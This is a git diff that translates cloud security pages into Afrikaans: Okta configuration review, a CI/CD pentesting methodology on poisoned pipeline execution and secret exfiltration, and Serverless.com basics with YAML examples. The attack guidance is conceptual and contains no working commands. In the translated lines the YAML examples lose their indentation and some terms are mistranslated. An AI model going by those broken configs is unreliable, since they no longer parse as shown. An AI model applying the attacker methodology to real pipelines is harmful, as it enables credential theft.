-It's recommendatble to disable Phone. The strongest ones are probably a combination of password, email and WebAuthn. +Dit word aanbeveel om Telefoon te deaktiveer. Die sterkste is waarskynlik 'n kombinasie van wagwoord, e-pos en WebAuthn. ### Authentication policies -Every app has an authentication policy. The authentication policy verifies that users who try to sign in to the app meet specific conditions, and it enforces factor requirements based on those conditions. +Elke app het 'n autentikasiebeleid. Die autentikasiebeleid verifieer dat gebruikers wat probeer om in te teken op die app aan spesifieke voorwaardes voldoen, en dit handhaaf faktor vereistes gebaseer op daardie voorwaardes. -Here you can find the **requirements to access each application**. It's recommended to request at least password and another method for each application. But if as attacker you find something more weak you might be able to attack it. +Hier kan jy die **vereistes om toegang tot elke toepassing** te verkry vind. Dit word aanbeveel om ten minste wagwoord en 'n ander metode vir elke toepassing te vra. Maar as jy as aanvaller iets meer swak vind, kan jy dalk dit aanval. ### Global Session Policy -Here you can find the session policies assigned to different groups. For example: +Hier kan jy die sessiebeleide vind wat aan verskillende groepe toegeken is. Byvoorbeeld:
-It's recommended to request MFA, limit the session lifetime to some hours, don't persis session cookies across browser extensions and limit the location and Identity Provider (if this is possible). For example, if every user should be login from a country you could only allow this location. +Dit word aanbeveel om MFA te vra, die sessie lewensduur tot 'n paar ure te beperk, nie sessie koekies oor blaaiers te persisteer nie en die ligging en Identiteitsverskaffer te beperk (as dit moontlik is). Byvoorbeeld, as elke gebruiker van 'n land moet aanmeld, kan jy net hierdie ligging toelaat. ### Identity Providers -Identity Providers (IdPs) are services that **manage user accounts**. Adding IdPs in Okta enables your end users to **self-register** with your custom applications by first authenticating with a social account or a smart card. +Identiteitsverskaffers (IdPs) is dienste wat **gebruikersrekeninge bestuur**. Om IdPs in Okta by te voeg, stel jou eindgebruikers in staat om **self te registreer** met jou pasgemaakte toepassings deur eers met 'n sosiale rekening of 'n slimkaart te autentiseer. -On the Identity Providers page, you can add social logins (IdPs) and configure Okta as a service provider (SP) by adding inbound SAML. After you've added IdPs, you can set up routing rules to direct users to an IdP based on context, such as the user's location, device, or email domain. +Op die Identiteitsverskaffers bladsy kan jy sosiale aanmeldings (IdPs) byvoeg en Okta as 'n diensverskaffer (SP) configureer deur inkomende SAML by te voeg. Nadat jy IdPs bygevoeg het, kan jy roeteringsreĂ«ls opstel om gebruikers na 'n IdP te lei gebaseer op konteks, soos die gebruiker se ligging, toestel of e-pos domein. -**If any identity provider is configured** from an attackers and defender point of view check that configuration and **if the source is really trustable** as an attacker compromising it could also get access to the Okta environment. 
+**As enige identiteitsverskaffer geconfigureer is** vanuit 'n aanvaller en verdediger se perspektief, kyk daardie konfigurasie en **of die bron regtig betroubaar is** aangesien 'n aanvaller wat dit kompromitteer ook toegang tot die Okta omgewing kan kry. ### Delegated Authentication -Delegated authentication allows users to sign in to Okta by entering credentials for their organization's **Active Directory (AD) or LDAP** server. +Gedelegeerde autentikasie laat gebruikers toe om in te teken op Okta deur inligting vir hul organisasie se **Active Directory (AD) of LDAP** bediener in te voer. -Again, recheck this, as an attacker compromising an organizations AD could be able to pivot to Okta thanks to this setting. +Weereens, herkontroleer dit, aangesien 'n aanvaller wat 'n organisasie se AD kompromitteer, dalk in staat kan wees om na Okta te pivot deur hierdie instelling. ### Network -A network zone is a configurable boundary that you can use to **grant or restrict access to computers and devices** in your organization based on the **IP address** that is requesting access. You can define a network zone by specifying one or more individual IP addresses, ranges of IP addresses, or geographic locations. +'n Netwerk sone is 'n konfigureerbare grens wat jy kan gebruik om **toegang tot rekenaars en toestelle** in jou organisasie te **verleen of te beperk** gebaseer op die **IP adres** wat toegang versoek. Jy kan 'n netwerk sone definieer deur een of meer individuele IP adresse, reekse van IP adresse, of geografiese liggings te spesifiseer. -After you define one or more network zones, you can **use them in Global Session Policies**, **authentication policies**, VPN notifications, and **routing rules**. +Nadat jy een of meer netwerk zones gedefinieer het, kan jy **dit in Globale Sessie Beleide**, **autentikasiebeleide**, VPN kennisgewings, en **roeteringsreĂ«ls** gebruik. 
-From an attackers perspective it's interesting to know which Ps are allowed (and check if any **IPs are more privileged** than others). From an attackers perspective, if the users should be accessing from an specific IP address or region check that this feature is used properly. +Vanuit 'n aanvaller se perspektief is dit interessant om te weet watter Ps toegelaat word (en kyk of enige **IPs meer bevoorreg** is as ander). Vanuit 'n aanvaller se perspektief, as die gebruikers van 'n spesifieke IP adres of streek moet toegang hĂȘ, kyk of hierdie funksie behoorlik gebruik word. ### Device Integrations -- **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application. - - I haven't seen this used yet. TODO -- **Notification services**: I haven't seen this used yet. TODO +- **Endpoint Management**: Eindpuntbestuur is 'n voorwaarde wat in 'n autentikasiebeleid toegepas kan word om te verseker dat bestuurde toestelle toegang tot 'n toepassing het. +- Ek het dit nog nie gesien nie. TODO +- **Kennisgewing dienste**: Ek het dit nog nie gesien nie. TODO ### API -You can create Okta API tokens in this page, and see the ones that have been **created**, theirs **privileges**, **expiration** time and **Origin URLs**. Note that an API tokens are generated with the permissions of the user that created the token and are valid only if the **user** who created them is **active**. +Jy kan Okta API tokens op hierdie bladsy skep, en diegene sien wat **gecreĂ«er** is, hul **privileges**, **verval** tyd en **Oorsprong URL's**. Let daarop dat 'n API token gegenereer word met die toestemmings van die gebruiker wat die token geskep het en slegs geldig is as die **gebruiker** wat dit geskep het **aktief** is. -The **Trusted Origins** grant access to websites that you control and trust to access your Okta org through the Okta API. 
+Die **Betroubare Oorspronge** verleen toegang tot webwerwe wat jy beheer en vertrou om toegang tot jou Okta org deur die Okta API te verkry. -There shuoldn't be a lot of API tokens, as if there are an attacker could try to access them and use them. +Daar moet nie baie API tokens wees nie, aangesien as daar is, kan 'n aanvaller probeer om toegang tot hulle te kry en hulle te gebruik. ## Workflow ### Automations -Automations allow you to create automated actions that run based on a set of trigger conditions that occur during the lifecycle of end users. +Automatiserings laat jou toe om geoutomatiseerde aksies te skep wat loop gebaseer op 'n stel van trigger toestande wat tydens die lewensiklus van eindgebruikers voorkom. -For example a condition could be "User inactivity in Okta" or "User password expiration in Okta" and the action could be "Send email to the user" or "Change user lifecycle state in Okta". +Byvoorbeeld, 'n toestand kan wees "Gebruiker inaktiwiteit in Okta" of "Gebruiker wagwoord vervaldatum in Okta" en die aksie kan wees "Stuur e-pos aan die gebruiker" of "Verander gebruiker se lewensiklus toestand in Okta". ## Reports ### Reports -Download logs. They are **sent** to the **email address** of the current account. +Laai logs af. Hulle word **gestuur** na die **e-pos adres** van die huidige rekening. ### System Log -Here you can find the **logs of the actions performed by users** with a lot of details like login in Okta or in applications through Okta. +Hier kan jy die **logs van die aksies uitgevoer deur gebruikers** vind met baie besonderhede soos aanmelding in Okta of in toepassings deur Okta. ### Import Monitoring -This can **import logs from the other platforms** accessed with Okta. +Dit kan **logs van die ander platforms** wat met Okta toegang het, **importeer**. ### Rate limits -Check the API rate limits reached. +Kyk die API koers beperkings wat bereik is. 
## Settings ### Account -Here you can find **generic information** about the Okta environment, such as the company name, address, **email billing contact**, **email technical contact** and also who should receive Okta updates and which kind of Okta updates. +Hier kan jy **generiese inligting** oor die Okta omgewing vind, soos die maatskappy se naam, adres, **e-pos faktuur kontak**, **e-pos tegniese kontak** en ook wie Okta opdaterings moet ontvang en watter soort Okta opdaterings. ### Downloads -Here you can download Okta agents to sync Okta with other technologies. +Hier kan jy Okta agente aflaai om Okta met ander tegnologieĂ« te sinkroniseer. {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md index 41899af04..f065fbf50 100644 --- a/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md +++ b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md @@ -1,4 +1,4 @@ -# Pentesting CI/CD Methodology +# Pentesting CI/CD Metodologie {{#include ../banners/hacktricks-training.md}} 
@@ -6,103 +6,99 @@ ## VCS -VCS stands for **Version Control System**, this systems allows developers to **manage their source code**. The most common one is **git** and you will usually find companies using it in one of the following **platforms**: +VCS staan vir **Version Control System**, hierdie stelsels laat ontwikkelaars toe om **hulle bronkode te bestuur**. Die mees algemene een is **git** en jy sal gewoonlik maatskappye vind wat dit gebruik in een van die volgende **platforms**: - Github - Gitlab - Bitbucket - Gitea -- Cloud providers (they offer their own VCS platforms) +- Cloud verskaffers (hulle bied hul eie VCS-platforms aan) -## CI/CD Pipelines +## CI/CD Pypelines -CI/CD pipelines enable developers to **automate the execution of code** for various purposes, including building, testing, and deploying applications. These automated workflows are **triggered by specific actions**, such as code pushes, pull requests, or scheduled tasks. They are useful for streamlining the process from development to production. +CI/CD pypelines stel ontwikkelaars in staat om **die uitvoering van kode te outomatiseer** vir verskeie doeleindes, insluitend bou, toets en ontplooi van toepassings. Hierdie geoutomatiseerde werksvloei word **geaktiveer deur spesifieke aksies**, soos kode stoot, trek versoeke, of geskeduleerde take. Hulle is nuttig om die proses van ontwikkeling na produksie te stroomlyn. -However, these systems need to be **executed somewhere** and usually with **privileged credentials to deploy code or access sensitive information**. +Egter, hierdie stelsels moet **ergens uitgevoer word** en gewoonlik met **bevoorregte akrediteer om kode te ontplooi of toegang tot sensitiewe inligting te verkry**. -## VCS Pentesting Methodology +## VCS Pentesting Metodologie > [!NOTE] -> Even if some VCS platforms allow to create pipelines for this section we are going to analyze only potential attacks to the control of the source code. 
+> Alhoewel sommige VCS-platforms toelaat om pypelines te skep, gaan ons in hierdie afdeling slegs potensiĂ«le aanvalle op die beheer van die bronkode analiseer. -Platforms that contains the source code of your project contains sensitive information and people need to be very careful with the permissions granted inside this platform. These are some common problems across VCS platforms that attacker could abuse: +Platforms wat die bronkode van jou projek bevat, bevat sensitiewe inligting en mense moet baie versigtig wees met die toestemmings wat binne hierdie platform toegestaan word. Dit is 'n paar algemene probleme oor VCS-platforms wat aanvallers kan misbruik: -- **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover the leaks. -- **Access**: If an attacker can **access to an account inside the VCS platform** he could gain **more visibility and permissions**. - - **Register**: Some platforms will just allow external users to create an account. - - **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter for example). - - **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... there are several kind of tokens a user could steal to access in some way a repo. -- **Webhooks**: VCS platforms allow to generate webhooks. If they are **not protected** with non visible secrets an **attacker could abuse them**. - - If no secret is in place, the attacker could abuse the webhook of the third party platform - - If the secret is in the URL, the same happens and the attacker also have the secret -- **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. In order to be successful he might need to **bypass branch protections**. 
These actions can be performed with different goals in mid: - - Compromise the main branch to **compromise production**. - - Compromise the main (or other branches) to **compromise developers machines** (as they usually execute test, terraform or other things inside the repo in their machines). - - **Compromise the pipeline** (check next section) +- **Lekke**: As jou kode lekke in die verbintenisse bevat en die aanvaller toegang tot die repo kan verkry (omdat dit publiek is of omdat hy toegang het), kan hy die lekke ontdek. +- **Toegang**: As 'n aanvaller **toegang tot 'n rekening binne die VCS-platform** kan verkry, kan hy **meer sigbaarheid en toestemmings** verkry. +- **Registrasie**: Sommige platforms sal net eksterne gebruikers toelaat om 'n rekening te skep. +- **SSO**: Sommige platforms sal nie gebruikers toelaat om te registreer nie, maar sal enigeen toelaat om toegang te verkry met 'n geldige SSO (so 'n aanvaller kan sy github-rekening gebruik om in te gaan byvoorbeeld). +- **Akrediteer**: Gebruikersnaam+Pwd, persoonlike tokens, ssh sleutels, Oauth tokens, koekies... daar is verskeie tipes tokens wat 'n gebruiker kan steel om op een of ander manier toegang tot 'n repo te verkry. +- **Webhooks**: VCS-platforms laat toe om webhooks te genereer. As hulle **nie beskerm** is met nie-sigtbare geheime nie, kan 'n **aanvaller dit misbruik**. +- As daar geen geheim is nie, kan die aanvaller die webhook van die derdeparty-platform misbruik. +- As die geheim in die URL is, gebeur dieselfde en die aanvaller het ook die geheim. +- **Kode kompromie:** As 'n kwaadwillige akteur 'n soort **skryf** toegang oor die repos het, kan hy probeer om **kwaadwillige kode in te spuit**. Om suksesvol te wees, mag hy moet **tak beskermings omseil**. Hierdie aksies kan met verskillende doelwitte in gedagte uitgevoer word: +- Kompromitteer die hooftak om **produksie te kompromitteer**. 
+- Kompromitteer die hoof (of ander takke) om **ontwikkelaars se masjiene te kompromitteer** (aangesien hulle gewoonlik toets, terraform of ander dinge binne die repo op hul masjiene uitvoer). +- **Kompromitteer die pypeline** (kyk na die volgende afdeling) -## Pipelines Pentesting Methodology +## Pypelines Pentesting Metodologie -The most common way to define a pipeline, is by using a **CI configuration file hosted in the repository** the pipeline builds. This file describes the order of executed jobs, conditions that affect the flow, and build environment settings.\ -These files typically have a consistent name and format, for example — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), and the GitHub Actions YAML files located under .github/workflows. When triggered, the pipeline job **pulls the code** from the selected source (e.g. commit / branch), and **runs the commands specified in the CI configuration file** against that code. +Die mees algemene manier om 'n pypeline te definieer, is deur 'n **CI-konfigurasie lĂȘer wat in die repo gehos is** te gebruik. Hierdie lĂȘer beskryf die volgorde van uitgevoerde werksgeleenthede, toestande wat die vloei beĂŻnvloed, en bou omgewing instellings.\ +Hierdie lĂȘers het tipies 'n konsekwente naam en formaat, byvoorbeeld — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), en die GitHub Actions YAML-lĂȘers wat onder .github/workflows geleĂ« is. Wanneer geaktiveer, **trek die pypeline werk** die kode van die geselekteerde bron (bv. verbintenis / tak), en **voert die opdragte uit wat in die CI-konfigurasie lĂȘer gespesifiseer is** teen daardie kode. -Therefore the ultimate goal of the attacker is to somehow **compromise those configuration files** or the **commands they execute**. +Daarom is die uiteindelike doel van die aanvaller om op een of ander manier **daardie konfigurasie lĂȘers** of die **opdragte wat hulle uitvoer** te **kompromitteer**. 
-### PPE - Poisoned Pipeline Execution +### PPE - Gevulde Pypeline Uitvoering -The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM repository to manipulate a CI pipeline and execute harmful commands. Users with the necessary permissions can modify CI configuration files or other files used by the pipeline job to include malicious commands. This "poisons" the CI pipeline, leading to the execution of these malicious commands. +Die Gevulde Pypeline Uitvoering (PPE) pad benut toestemmings in 'n SCM-repo om 'n CI-pypeline te manipuleer en skadelike opdragte uit te voer. Gebruikers met die nodige toestemmings kan CI-konfigurasie lĂȘers of ander lĂȘers wat deur die pypeline werk gebruik word, wysig om kwaadwillige opdragte in te sluit. Dit "vervuil" die CI-pypeline, wat lei tot die uitvoering van hierdie kwaadwillige opdragte. -For a malicious actor to be successful performing a PPE attack he needs to be able to: +Vir 'n kwaadwillige akteur om suksesvol 'n PPE-aanval uit te voer, moet hy in staat wees om: -- Have **write access to the VCS platform**, as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access). - - Note that sometimes an **external PR count as "write access"**. -- Even if he has write permissions, he needs to be sure he can **modify the CI config file or other files the config is relying on**. - - For this, he might need to be able to **bypass branch protections**. +- **Skryf toegang tot die VCS-platform** te hĂȘ, aangesien pypelines gewoonlik geaktiveer word wanneer 'n stoot of 'n trek versoek uitgevoer word. (Kyk na die VCS pentesting metodologie vir 'n opsomming van maniere om toegang te verkry). +- Let daarop dat soms 'n **eksterne PR as "skryf toegang" tel**. +- Selfs as hy skryf toestemmings het, moet hy seker wees dat hy die **CI konfigurasie lĂȘer of ander lĂȘers waarop die konfigurasie staatmaak** kan **wysig**. 
+- Hiervoor mag hy moet in staat wees om **tak beskermings om te seil**. -There are 3 PPE flavours: +Daar is 3 PPE variasies: -- **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config** file that is going to be executed. -- **I-DDE**: An **Indirect PPE** attack occurs when the actor **modifies** a **file** the CI config file that is going to be executed **relays on** (like a make file or a terraform config). -- **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that doesn't have write access in the repo** (and that might not even be part of the org) because they can send a PR. - - **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**. +- **D-PPE**: 'n **Direkte PPE** aanval vind plaas wanneer die akteur die **CI konfigurasie** lĂȘer wat gaan uitgevoer word, **wysig**. +- **I-DDE**: 'n **Indirekte PPE** aanval vind plaas wanneer die akteur 'n **lĂȘer** wat die CI konfigurasie lĂȘer wat gaan uitgevoer word, **afhang** (soos 'n make-lĂȘer of 'n terraform konfigurasie). +- **Publieke PPE of 3PE**: In sommige gevalle kan die pypelines **geaktiveer word deur gebruikers wat nie skryf toegang in die repo het nie** (en wat dalk nie eens deel van die org is nie) omdat hulle 'n PR kan stuur. +- **3PE Opdrag Inspuiting**: Gewoonlik sal CI/CD pypelines **omgewing veranderlikes** met **inligting oor die PR** stel. As daardie waarde deur 'n aanvaller beheer kan word (soos die titel van die PR) en is **gebruik** in 'n **gevaarlike plek** (soos die uitvoering van **sh opdragte**), kan 'n aanvaller **opdragte daar in spuit**. 
-### Exploitation Benefits +### Exploitatie Voordele -Knowing the 3 flavours to poison a pipeline, lets check what an attacker could obtain after a successful exploitation: +Om die 3 variasies om 'n pypeline te vervuil te ken, laat ons kyk wat 'n aanvaller kan verkry na 'n suksesvolle eksploitatie: -- **Secrets**: As it was mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) and this privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as much secrets as possible. - - Depending on the pipeline platform the attacker **might need to specify the secrets in the config**. This means that is the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he could **only exfiltrate the secrets that pipeline has**. -- **Computation**: The code is executed somewhere, depending on where is executed an attacker might be able to pivot further. - - **On-Premises**: If the pipelines are executed on premises, an attacker might end in an **internal network with access to more resources**. - - **Cloud**: The attacker could access **other machines in the cloud** but also could **exfiltrate** IAM roles/service accounts **tokens** from it to obtain **further access inside the cloud**. - - **Platforms machine**: Sometimes the jobs will be execute inside the **pipelines platform machines**, which usually are inside a cloud with **no more access**. - - **Select it:** Sometimes the **pipelines platform will have configured several machines** and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further. 
-- **Compromise production**: If you ware inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end running in production**. +- **Geheime**: Soos voorheen genoem, vereis pypelines **bevoegdhede** vir hul werksgeleenthede (om die kode te verkry, dit te bou, dit te ontplooi...) en hierdie bevoegdhede word gewoonlik **in geheime toegestaan**. Hierdie geheime is gewoonlik toeganklik via **omgewing veranderlikes of lĂȘers binne die stelsel**. Daarom sal 'n aanvaller altyd probeer om soveel geheime as moontlik te eksfiltreer. +- Afhangende van die pypeline platform mag die aanvaller **die geheime in die konfigurasie moet spesifiseer**. Dit beteken dat as die aanvaller nie die CI konfigurasie pypeline kan wysig nie (**I-PPE** byvoorbeeld), kan hy **slegs die geheime wat daardie pypeline het, eksfiltreer**. +- **Berekening**: Die kode word ĂȘrens uitgevoer, afhangende van waar dit uitgevoer word, mag 'n aanvaller in staat wees om verder te pivot. +- **On-premises**: As die pypelines op plek uitgevoer word, mag 'n aanvaller eindig in 'n **interne netwerk met toegang tot meer hulpbronne**. +- **Cloud**: Die aanvaller kan toegang verkry tot **ander masjiene in die cloud** maar kan ook **eksfiltreer** IAM rolle/dienste rekeninge **tokens** daarvan om **verdere toegang binne die cloud** te verkry. +- **Platforms masjien**: Soms sal die werksgeleenthede binne die **pypelines platform masjiene** uitgevoer word, wat gewoonlik binne 'n cloud met **geen verdere toegang** is. +- **Kies dit:** Soms sal die **pypelines platform verskeie masjiene geconfigureer hĂȘ** en as jy die **CI konfigurasie lĂȘer kan wysig**, kan jy **aangee waar jy die kwaadwillige kode wil uitvoer**. In hierdie situasie sal 'n aanvaller waarskynlik 'n omgekeerde skulp op elke moontlike masjien uitvoer om te probeer om dit verder te exploiteer. 
+- **Kompromitteer produksie**: As jy binne die pypeline is en die finale weergawe daaruit gebou en ontplooi word, kan jy **die kode wat in produksie gaan loop, kompromitteer**. -## More relevant info +## Meer relevante inligting -### Tools & CIS Benchmark +### Gereedskap & CIS Benchmark -- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time. +- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is 'n oopbron gereedskap vir die oudit van jou sagteware voorsieningsketting stap vir sekuriteits nakoming gebaseer op 'n nuwe [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). Die oudit fokus op die hele SDLC-proses, waar dit risiko's van kode tyd in ontplooi tyd kan onthul. 
-### Top 10 CI/CD Security Risk +### Top 10 CI/CD Sekuriteitsrisiko's -Check this interesting article about the top 10 CI/CD risks according to Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/) +Kyk na hierdie interessante artikel oor die top 10 CI/CD risiko's volgens Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/) -### Labs +### Laboratoriums -- On each platform that you can run locally you will find how to launch it locally so you can configure it as you want to test it -- Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat) +- Op elke platform wat jy plaaslik kan uitvoer, sal jy vind hoe om dit plaaslik te begin sodat jy dit kan konfigureer soos jy wil om dit te toets. +- Gitea + Jenkins laboratorium: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat) -### Automatic Tools +### Outomatiese Gereedskap -- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code. +- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is 'n statiese kode analise gereedskap vir infrastruktuur-as-kode. -## References +## Verwysings - [https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github\&utm_medium=github_page\&utm_campaign=ci%2fcd%20goat_060422](https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github&utm_medium=github_page&utm_campaign=ci%2fcd%20goat_060422) {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/serverless.com-security.md b/src/pentesting-ci-cd/serverless.com-security.md index bf1343702..f05ae848c 100644 --- a/src/pentesting-ci-cd/serverless.com-security.md 
+++ b/src/pentesting-ci-cd/serverless.com-security.md 
@@ -1,303 +1,274 @@ -# Serverless.com Security +# Serverless.com Veiligheid {{#include ../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -### Organization +### Organisasie -An **Organization** is the highest-level entity within the Serverless Framework ecosystem. It represents a **collective group**, such as a company, department, or any large entity, that encompasses multiple projects, teams, and applications. +'n **Organisasie** is die hoogste vlak entiteit binne die Serverless Framework ekosisteem. Dit verteenwoordig 'n **kollektiewe groep**, soos 'n maatskappy, departement, of enige groot entiteit, wat verskeie projekte, spanne, en toepassings insluit. -### Team +### Span -The **Team** are the users with access inside the organization. Teams help in organizing members based on roles. **`Collaborators`** can view and deploy existing apps, while **`Admins`** can create new apps and manage organization settings. +Die **Span** is die gebruikers met toegang binne die organisasie. Spanne help om lede te organiseer op grond van rolle. **`Samewerkers`** kan bestaande toepassings sien en ontplooi, terwyl **`Admins`** nuwe toepassings kan skep en organisasie-instellings kan bestuur. -### Application +### Toepassing -An **App** is a logical grouping of related services within an Organization. It represents a complete application composed of multiple serverless services that work together to provide a cohesive functionality. +'n **App** is 'n logiese groepe van verwante dienste binne 'n Organisasie. Dit verteenwoordig 'n volledige toepassing wat bestaan uit verskeie serverless dienste wat saamwerk om 'n samehangende funksionaliteit te bied. -### **Services** - -A **Service** is the core component of a Serverless application. It represents your entire serverless project, encapsulating all the functions, configurations, and resources needed. 
It's typically defined in a `serverless.yml` file, a service includes metadata like the service name, provider configurations, functions, events, resources, plugins, and custom variables. +### **Dienste** +'n **Diens** is die kernkomponent van 'n Serverless toepassing. Dit verteenwoordig jou hele serverless projek, wat al die funksies, konfigurasies, en hulpbronne insluit wat nodig is. Dit word tipies gedefinieer in 'n `serverless.yml` lĂȘer, 'n diens sluit metadata in soos die diensnaam, verskaffer konfigurasies, funksies, gebeurtenisse, hulpbronne, plugins, en persoonlike veranderlikes. ```yaml service: my-service provider: - name: aws - runtime: nodejs14.x +name: aws +runtime: nodejs14.x functions: - hello: - handler: handler.hello +hello: +handler: handler.hello ``` -
-Function +Funksie -A **Function** represents a single serverless function, such as an AWS Lambda function. It contains the code that executes in response to events. - -It's defined under the `functions` section in `serverless.yml`, specifying the handler, runtime, events, environment variables, and other settings. +'n **Funksie** verteenwoordig 'n enkele serverless funksie, soos 'n AWS Lambda funksie. Dit bevat die kode wat uitgevoer word in reaksie op gebeurtenisse. +Dit is gedefinieer onder die `functions` afdeling in `serverless.yml`, wat die handler, runtime, gebeurtenisse, omgewingsveranderlikes, en ander instellings spesifiseer. ```yaml functions: - hello: - handler: handler.hello - events: - - http: - path: hello - method: get +hello: +handler: handler.hello +events: +- http: +path: hello +method: get ``` -
-Event +Gebeurtenis -**Events** are triggers that invoke your serverless functions. They define how and when a function should be executed. - -Common event types include HTTP requests, scheduled events (cron jobs), database events, file uploads, and more. +**Gebeurtenisse** is triggers wat jou serverless funksies aanroep. Hulle definieer hoe en wanneer 'n funksie uitgevoer moet word. +Gewone gebeurtenistipes sluit HTTP versoeke, geskeduleerde gebeurtenisse (cron jobs), databasis gebeurtenisse, lĂȘer opgelaai, en meer in. ```yaml functions: - hello: - handler: handler.hello - events: - - http: - path: hello - method: get - - schedule: - rate: rate(10 minutes) +hello: +handler: handler.hello +events: +- http: +path: hello +method: get +- schedule: +rate: rate(10 minutes) ``` -
-Resource +Hulpbronne -**Resources** allow you to define additional cloud resources that your service depends on, such as databases, storage buckets, or IAM roles. - -They are specified under the `resources` section, often using CloudFormation syntax for AWS. +**Hulpbronne** stel jou in staat om addisionele wolkhulpbronne te definieer waarop jou diens afhanklik is, soos databasisse, stoor emmers of IAM rolle. +Hulle word onder die `resources` afdeling gespesifiseer, dikwels met behulp van CloudFormation-sintaksis vir AWS. ```yaml resources: - Resources: - MyDynamoDBTable: - Type: AWS::DynamoDB::Table - Properties: - TableName: my-table - AttributeDefinitions: - - AttributeName: id - AttributeType: S - KeySchema: - - AttributeName: id - KeyType: HASH - ProvisionedThroughput: - ReadCapacityUnits: 1 - WriteCapacityUnits: 1 +Resources: +MyDynamoDBTable: +Type: AWS::DynamoDB::Table +Properties: +TableName: my-table +AttributeDefinitions: +- AttributeName: id +AttributeType: S +KeySchema: +- AttributeName: id +KeyType: HASH +ProvisionedThroughput: +ReadCapacityUnits: 1 +WriteCapacityUnits: 1 ``` -
-Provider +Verskaffer -The **Provider** object specifies the cloud service provider (e.g., AWS, Azure, Google Cloud) and contains configuration settings relevant to that provider. - -It includes details like the runtime, region, stage, and credentials. +Die **Verskaffer** objek spesifiseer die wolkdiensteverskaffer (bv. AWS, Azure, Google Cloud) en bevat konfigurasie-instellings wat relevant is vir daardie verskaffer. +Dit sluit besonderhede in soos die runtime, streek, fase, en geloofsbriewe. ```yaml yamlCopy codeprovider: - name: aws - runtime: nodejs14.x - region: us-east-1 - stage: dev +name: aws +runtime: nodejs14.x +region: us-east-1 +stage: dev ``` -
-Stage and Region - -The stage represents different environments (e.g., development, staging, production) where your service can be deployed. It allows for environment-specific configurations and deployments. +Fase en Streek +Die fase verteenwoordig verskillende omgewings (bv., ontwikkeling, staging, produksie) waar jou diens ontplooi kan word. Dit stel spesifieke konfigurasies en ontplooiings vir die omgewing in staat. ```yaml provider: - stage: dev +stage: dev ``` - -The region specifies the geographical region where your resources will be deployed. It's important for latency, compliance, and availability considerations. - +Die streek spesifiseer die geografiese streek waar jou hulpbronne ontplooi sal word. Dit is belangrik vir latensie, nakoming en beskikbaarheids oorwegings. ```yaml provider: - region: us-west-2 +region: us-west-2 ``` -
Plugins -**Plugins** extend the functionality of the Serverless Framework by adding new features or integrating with other tools and services. They are defined under the `plugins` section and installed via npm. - +**Plugins** brei die funksionaliteit van die Serverless Framework uit deur nuwe kenmerke by te voeg of te integreer met ander gereedskap en dienste. Hulle word onder die `plugins` afdeling gedefinieer en geĂŻnstalleer via npm. ```yaml plugins: - - serverless-offline - - serverless-webpack +- serverless-offline +- serverless-webpack ``` -
-Layers - -**Layers** allow you to package and manage shared code or dependencies separately from your functions. This promotes reusability and reduces deployment package sizes. They are defined under the `layers` section and referenced by functions. +Lae +**Lae** stel jou in staat om gedeelde kode of afhanklikhede apart van jou funksies te pak en te bestuur. Dit bevorder herbruikbaarheid en verminder die grootte van ontplooiingspakkette. Hulle word onder die `layers` afdeling gedefinieer en deur funksies verwys. ```yaml layers: - commonLibs: - path: layer-common +commonLibs: +path: layer-common functions: - hello: - handler: handler.hello - layers: - - { Ref: CommonLibsLambdaLayer } +hello: +handler: handler.hello +layers: +- { Ref: CommonLibsLambdaLayer } +``` +
+ +
